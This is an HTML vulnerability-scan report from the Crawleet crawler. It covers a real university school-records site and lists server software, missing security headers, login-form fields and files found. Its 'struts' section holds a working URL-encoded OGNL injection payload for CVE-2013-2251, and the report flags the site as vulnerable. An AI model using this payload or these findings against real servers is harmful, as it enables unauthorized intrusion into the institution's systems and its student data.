
		<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
		<title>escolares.dgenp.unam.mx</title>
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.2.0/styles/default.min.css">
		<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.2.0/highlight.min.js"></script>
		<script type='text/javascript'>hljs.initHighlightingOnLoad();</script>
		
<style>

@import "https://fonts.googleapis.com/css?family=Montserrat:400,700|Raleway:300,400";
/* colors */
/* tab setting */
/* breakpoints */
/* selectors relative to radio inputs */
html {
  width: 100%;
  height: 100%;
}

body {
  background: black;
  color: #333;
  font-family: "Raleway";
  height: 100%;
  font-size: 13px;
}

td {

  position: relative;
  background: white;
  padding: 50px;
  width: 55%;
  border-radius: 5px;
  min-width: 240px;
  overflow:auto;
}

.htext {
    color: white;
}

body h1 {
  text-align: center;
  color: #428BFF;
  font-weight: 300;
  padding: 40px 0 20px 0;
  margin: 0;
}

body h2 {
  color: #428BFF;
  font-weight: 40;
  margin: 0;
  font-size: 14;
  padding: 10px;
}

body img {
	width: 600;
}

img:active {
	transform: translateX(-35%) scale(2);
}

.tabs {
  left: 50%;
  -webkit-transform: translateX(-50%);
          transform: translateX(-50%);
  position: relative;
  background: white;
  padding: 50px;
  padding-bottom: 35px;
  width: 85%;
  box-shadow: 0 14px 28px rgba(0, 0, 0, 0.25), 0 10px 10px rgba(0, 0, 0, 0.22);
  border-radius: 5px;
  min-width: 240px;
  overflow:auto;
  display:block;
}

.tabs input[name="tab-control"] {
  display: none;
}

.tabs .content section h2,
.tabs ul li label {
  font-family: "Montserrat";
  font-weight: bold;
  font-size: 14px;
  color: #428BFF;
}

.tabs ul {
  list-style-type: none;
  padding-left: 0;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  margin-bottom: 10px;
  -webkit-box-pack: justify;
      -ms-flex-pack: justify;
          justify-content: space-between;
  -webkit-box-align: end;
      -ms-flex-align: end;
          align-items: flex-end;
  -ms-flex-wrap: wrap;
      flex-wrap: wrap;
}
.tabs ul li {
  box-sizing: border-box;
  -webkit-box-flex: 1;
      -ms-flex: 1;
          flex: 1;
  width: 25%;
  padding: 0 10px;
  text-align: center;
}
.tabs ul li label {
  -webkit-transition: all 0.3s ease-in-out;
  transition: all 0.3s ease-in-out;
  color: #929daf;
  padding: 5px auto;
  overflow: hidden;
  text-overflow: ellipsis;
  display: block;
  cursor: pointer;
  -webkit-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  white-space: nowrap;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}

.tabs ul li label br {
  display: none;
}

.tabs ul li label svg {
  fill: #929daf;
  height: 1.2em;
  vertical-align: bottom;
  margin-right: 0.2em;
  -webkit-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
}

.tabs ul li label:hover, .tabs ul li label:focus, .tabs ul li label:active {
  outline: 0;
  color: #bec5cf;
}

.tabs ul li label:hover svg, .tabs ul li label:focus svg, .tabs ul li label:active svg {
  fill: #bec5cf;
}

.tabs .slider {
  position: relative;
  width: 25%;
  -webkit-transition: all 0.33s cubic-bezier(0.38, 0.8, 0.32, 1.07);
  transition: all 0.33s cubic-bezier(0.38, 0.8, 0.32, 1.07);
}

.tabs .slider .indicator {
  position: relative;
  width: 50px;
  max-width: 100%;
  margin: 0 auto;
  height: 4px;
  background: #428BFF;
  border-radius: 1px;
}

.tabs .content {
  margin-top: 30px;
}

.tabs .content section {
  display: none;
  -webkit-animation-name: content;
          animation-name: content;
  -webkit-animation-direction: normal;
          animation-direction: normal;
  -webkit-animation-duration: 0.3s;
          animation-duration: 0.3s;
  -webkit-animation-timing-function: ease-in-out;
          animation-timing-function: ease-in-out;
  -webkit-animation-iteration-count: 1;
          animation-iteration-count: 1;
  line-height: 0.8;
}
.tabs .content section h2 {
  color: #428BFF;
  display: none;
}

.tabs .content section h3 {
  color: #428BFF;
  font-weight: 40;
  margin: 0;
  font-size: 14;
  margin-top: 25px;
  left: 1px;
}

.tabs .content section h2::after {
  content: "";
  position: relative;
  display: block;
  width: 30px;
  height: 3px;
  background: #428BFF;
  margin-top: 5px;
  left: 1px;
}

@-webkit-keyframes content {
  from {
    opacity: 0;
    -webkit-transform: translateY(5%);
            transform: translateY(5%);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0%);
            transform: translateY(0%);
  }
}
@keyframes content {
  from {
    opacity: 0;
    -webkit-transform: translateY(5%);
            transform: translateY(5%);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0%);
            transform: translateY(0%);
  }
}

.tabs input[name="tab-control"]:nth-of-type(1):checked ~ ul > li:nth-child(1) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(1):checked ~ .content > section:nth-child(1) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(2):checked ~ ul > li:nth-child(2) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(2):checked ~ .content > section:nth-child(2) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(3):checked ~ ul > li:nth-child(3) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(3):checked ~ .content > section:nth-child(3) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(4):checked ~ ul > li:nth-child(4) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(4):checked ~ .content > section:nth-child(4) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(5):checked ~ ul > li:nth-child(5) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(5):checked ~ .content > section:nth-child(5) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(6):checked ~ ul > li:nth-child(6) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(6):checked ~ .content > section:nth-child(6) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(7):checked ~ ul > li:nth-child(7) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(7):checked ~ .content > section:nth-child(7) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(8):checked ~ ul > li:nth-child(8) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(8):checked ~ .content > section:nth-child(8) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(9):checked ~ ul > li:nth-child(9) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(9):checked ~ .content > section:nth-child(9) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(10):checked ~ ul > li:nth-child(10) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(10):checked ~ .content > section:nth-child(10) {display: block;}
.tabs input[name="tab-control"]:nth-of-type(11):checked ~ ul > li:nth-child(11) > label {cursor: default;color: #428BFF;}
.tabs input[name="tab-control"]:nth-of-type(11):checked ~ .content > section:nth-child(11) {display: block;}
</style>
</head>

<body>
<h1>escolares.dgenp.unam.mx</h1>
<div class="tabs">
<input type="radio" id="tab0" name="tab-control">
<input type="radio" id="tab1" name="tab-control">
<input type="radio" id="tab2" name="tab-control">
<input type="radio" id="tab3" name="tab-control" checked>
<input type="radio" id="tab4" name="tab-control">
<input type="radio" id="tab5" name="tab-control">
<input type="radio" id="tab6" name="tab-control">
<input type="radio" id="tab7" name="tab-control">
<input type="radio" id="tab8" name="tab-control">
<input type="radio" id="tab9" name="tab-control">
<input type="radio" id="tab10" name="tab-control">
<ul>
<li title="execution"><label for="tab0" role="button"><br><span>execution</span></label></li>
<li title="headers"><label for="tab1" role="button"><br><span>headers</span></label></li>
<li title="http methods"><label for="tab2" role="button"><br><span>http methods</span></label></li>
<li title="statistics"><label for="tab3" role="button"><br><span>statistics</span></label></li>
<li title="files"><label for="tab4" role="button"><br><span>files</span></label></li>
<li title="content"><label for="tab5" role="button"><br><span>content</span></label></li>
<li title="Resources"><label for="tab6" role="button"><br><span>Resources</span></label></li>
<li title="Forms"><label for="tab7" role="button"><br><span>Forms</span></label></li>
<li title="struts"><label for="tab8" role="button"><br><span>struts</span></label></li>
<li title="sitemap"><label for="tab9" role="button"><br><span>sitemap</span></label></li>
<li title="dns subdomains"><label for="tab10" role="button"><br><span>dns subdomains</span></label></li>
</ul>
<div class="content">
<section>
<h2>execution</h2>
<pre>
	<code class="sh">
<p>Crawleet by truerandom<p>Scan date: 2018-09-27<p>Startpage: http://www.escolares.dgenp.unam.mx/<p>Depth: 4<p>Delay: 0.2<p>MaxFiles: 20<p>Run External Tools: False<p>Excluded dirs: <p>Bruteforce: False<p>Wordlist: /root/crawleet/data/wordlist.txt<p>Bruteforce extensions: <p>Config file: /root/crawleet/data/scanningtools.xml<p>Allow Redirects: False<p>Verify Certs: True<p>Cookies: &lt;RequestsCookieJar[]&gt;<p>Useragent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko<p>Tor: False<p>Proxies:{}<p>Timeout: 3.0<p>IP used: 132.248.124.170
</code>
	</pre></section>
<section>
<h2>headers</h2><p>************ Info Headers **************<p>Server: GlassFish Server Open Source Edition  4.1.1<p>X-Powered-By: JSP/2.3<p>*********Missing Secure Headers*********<p>X-Content-Type-Options not found<p>X-Frame-Options not found<p>Strict-Transport-Security not found<p>X-XSS-Protection not found<p>Content-Security-Policy not found<p>Public-Key-Pins not found</section>
<section>
<h2>http methods</h2><p>POST<p>OPTIONS<p>GET</section>
<section>
<h2>statistics</h2><p>Puntuation: 47<p>Priority: <p>2<p>Resources: 3<p>Broken Links: 0<p>Files found: 17<p>External links: 0<p>Directory listing: 0<p>content: 1</section>
<section>
<h2>files</h2><p><a href="http://escolares.dgenp.unam.mx/css/iae.css">http://escolares.dgenp.unam.mx/css/iae.css</a><p><a href="http://escolares.dgenp.unam.mx/js/jquery-1.8.0.min.js">http://escolares.dgenp.unam.mx/js/jquery-1.8.0.min.js</a><p><a href="http://escolares.dgenp.unam.mx/js/roll_over_head.js">http://escolares.dgenp.unam.mx/js/roll_over_head.js</a><p><a href="http://www.escolares.dgenp.unam.mx/css/iae.css">http://www.escolares.dgenp.unam.mx/css/iae.css</a><p><a href="http://www.escolares.dgenp.unam.mx/images/ayuda.png">http://www.escolares.dgenp.unam.mx/images/ayuda.png</a><p><a href="http://www.escolares.dgenp.unam.mx/images/globoid.png">http://www.escolares.dgenp.unam.mx/images/globoid.png</a><p><a href="http://www.escolares.dgenp.unam.mx/images/globopass.png">http://www.escolares.dgenp.unam.mx/images/globopass.png</a><p><a href="http://www.escolares.dgenp.unam.mx/images/iae.jpg">http://www.escolares.dgenp.unam.mx/images/iae.jpg</a><p><a href="http://www.escolares.dgenp.unam.mx/images/iae_logo.jpg">http://www.escolares.dgenp.unam.mx/images/iae_logo.jpg</a><p><a href="http://www.escolares.dgenp.unam.mx/images/reload.png">http://www.escolares.dgenp.unam.mx/images/reload.png</a><p><a href="http://www.escolares.dgenp.unam.mx/images/transparencia.png">http://www.escolares.dgenp.unam.mx/images/transparencia.png</a><p><a href="http://www.escolares.dgenp.unam.mx/js/general.js">http://www.escolares.dgenp.unam.mx/js/general.js</a><p><a href="http://www.escolares.dgenp.unam.mx/js/head.js">http://www.escolares.dgenp.unam.mx/js/head.js</a><p><a href="http://www.escolares.dgenp.unam.mx/js/jquery-1.8.0.min.js">http://www.escolares.dgenp.unam.mx/js/jquery-1.8.0.min.js</a><p><a href="http://www.escolares.dgenp.unam.mx/js/pie.js">http://www.escolares.dgenp.unam.mx/js/pie.js</a><p><a href="http://www.escolares.dgenp.unam.mx/js/roll_over_head.js">http://www.escolares.dgenp.unam.mx/js/roll_over_head.js</a><p><a href="http://www.escolares.dgenp.unam.mx/simpleImg.png">http://www.escolares.dgenp.unam.mx/simpleImg.png</a></section>
<section>
<h2>content</h2><p>http://www.escolares.dgenp.unam.mx/inLog -> [(u'USUARIO NO ENCONTRADO', u'USUARIO')]</section>
<section>
<h2>Resources</h2><p><a href="http://www.escolares.dgenp.unam.mx/"><h3>http://www.escolares.dgenp.unam.mx/</a></h3><p>Form: inLog<p><a href="http://escolares.dgenp.unam.mx/."><h3>http://escolares.dgenp.unam.mx/.</a></h3><p>Form: inLog<p><a href="http://www.escolares.dgenp.unam.mx/inLog"><h3>http://www.escolares.dgenp.unam.mx/inLog</a></h3><p>Form: /inLog</section>
<section>
<h2>Forms</h2><p><a href="http://www.escolares.dgenp.unam.mx/inLog"><h3>http://www.escolares.dgenp.unam.mx/inLog</a></h3><p><h3></h3><p> POST<p>&lt;InputElement 7faf441fd1b0 name='answer' type='text'&gt;<p>&lt;InputElement 7faf441fd0a8 name='clave' type='text'&gt;<p>&lt;InputElement 7faf441fd100 name='pass' type='password'&gt;<p><a href="http://escolares.dgenp.unam.mx/inLog"><h3>http://escolares.dgenp.unam.mx/inLog</a></h3><p><h3></h3><p> POST<p>&lt;InputElement 7faf441fdba8 name='answer' type='text'&gt;<p>&lt;InputElement 7faf441fd730 name='clave' type='text'&gt;<p>&lt;InputElement 7faf441fdaf8 name='pass' type='password'&gt;</section>
<section>
<h2>struts</h2><p>[ http://www.escolares.dgenp.unam.mx/inLog?%72%65%64%69%72%65%63%74%3a%24%7b%23%72%65%71%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%71%75%65%73%74%27%29%2c%23%61%3d%23%72%65%71%2e%67%65%74%53%65%73%73%69%6f%6e%28%29%2c%23%62%3d%23%61%2e%67%65%74%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2c%23%63%3d%23%62%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%22%29%2c%23%6d%61%74%74%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%27%29%2c%23%6d%61%74%74%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%22%74%72%75%65%72%61%6e%64%6f%6d%22%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%29%2c%23%6d%61%74%74%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%6d%61%74%74%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d ] ====== VULNERABLE TO: cve-2013-2251 =====</section>
<section>
<h2>sitemap</h2>
<table>
<tr>
<td>
<pre>
	<code><p><a href="http://www.escolares.dgenp.unam.mx/">http://www.escolares.dgenp.unam.mx/</a><p><a href="http://www.escolares.dgenp.unam.mx//inLog">├── inLog</a><p><a href="http://www.escolares.dgenp.unam.mx//css">├── css</a><p><a href="http://www.escolares.dgenp.unam.mx//css/iae.css">│   └── iae.css</a><p><a href="http://www.escolares.dgenp.unam.mx//js">├── js</a><p><a href="http://www.escolares.dgenp.unam.mx//js/roll_over_head.js">│   ├── roll_over_head.js</a><p><a href="http://www.escolares.dgenp.unam.mx//js/jquery-1.8.0.min.js">│   ├── jquery-1.8.0.min.js</a><p><a href="http://www.escolares.dgenp.unam.mx//js/general.js">│   ├── general.js</a><p><a href="http://www.escolares.dgenp.unam.mx//js/head.js">│   ├── head.js</a><p><a href="http://www.escolares.dgenp.unam.mx//js/pie.js">│   └── pie.js</a><p><a href="http://www.escolares.dgenp.unam.mx//images">├── images</a><p><a href="http://www.escolares.dgenp.unam.mx//images/iae.jpg">│   ├── iae.jpg</a><p><a href="http://www.escolares.dgenp.unam.mx//images/ayuda.png">│   ├── ayuda.png</a><p><a href="http://www.escolares.dgenp.unam.mx//images/transparencia.png">│   ├── transparencia.png</a><p><a href="http://www.escolares.dgenp.unam.mx//images/globoid.png">│   ├── globoid.png</a><p><a href="http://www.escolares.dgenp.unam.mx//images/globopass.png">│   ├── globopass.png</a><p><a href="http://www.escolares.dgenp.unam.mx//images/reload.png">│   ├── reload.png</a><p><a href="http://www.escolares.dgenp.unam.mx//images/iae_logo.jpg">│   └── iae_logo.jpg</a><p><a href="http://www.escolares.dgenp.unam.mx//simpleImg.png">└── simpleImg.png</a>
<p>
	</code>
</pre>
</td>
<td class="htext"><pre><code><img src="escolares.dgenp.unam.mx.jpg"></pre></code>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
</td></tr></table></section>
<section>
<h2>dns subdomains</h2><p>escolares.dgenp.unam.mx</section></div></div>
</body>
</html>